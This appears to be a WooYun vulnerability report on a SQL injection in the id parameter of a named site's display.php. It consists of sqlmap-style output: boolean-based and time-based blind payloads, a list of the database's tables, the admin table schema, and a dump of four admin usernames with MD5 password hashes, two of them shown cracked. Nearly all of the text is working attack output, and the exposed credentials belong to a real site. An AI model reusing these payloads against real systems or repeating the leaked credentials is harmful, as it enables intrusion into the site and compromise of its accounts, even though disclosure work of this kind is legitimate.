WooYun.org

地址：http://www.fyyhbank.com/display.php?id=328
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=328 AND 2005=2005
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=328 AND SLEEP(5)
---
current user: 'fyyhbank@localhost'
current database: 'fyyhbank'
Database: fyyhbank
[26 tables]
+----------------+
| admin |
| admin_advanced |
| admin_login |
| admin_popedom |
| advanced |
| adver |
| album |
| album_class |
| banner |
| banner_class |
| booking |
| bossemail |
| business |
| config_base |
| info |
| info_class |
| job |
| job_apply |
| joinus |
| link |
| link_class |
| member |
| message |
| propsed |
| staff |
| store |
+----------------+
Table: admin
[9 columns]
+-------------+---------------------+
| Column | Type |
+-------------+---------------------+
| create_time | datetime |
| grade | tinyint(1) unsigned |
| id | int(10) unsigned |
| login_count | int(10) unsigned |
| modify_time | datetime |
| name | varchar(30) |
| pass | varchar(32) |
| realname | varchar(30) |
| state | tinyint(1) unsigned |
+-------------+---------------------+
Table: admin
[4 entries]
+----------+---------------------------------------------+
| name | pass |
+----------+---------------------------------------------+
| admin | 0192023a7bbd73250516f069df18b500 (admin123) |
| admindyb | 8ddcff3a80f4189ca1c9d4d902c3c909 (88888888) |
| adminhgb | ad324eb585496327017b46f1b1d526de |
| admingyb | 7bc7b277e3436b88e2494da6194ce807 |
+----------+---------------------------------------------+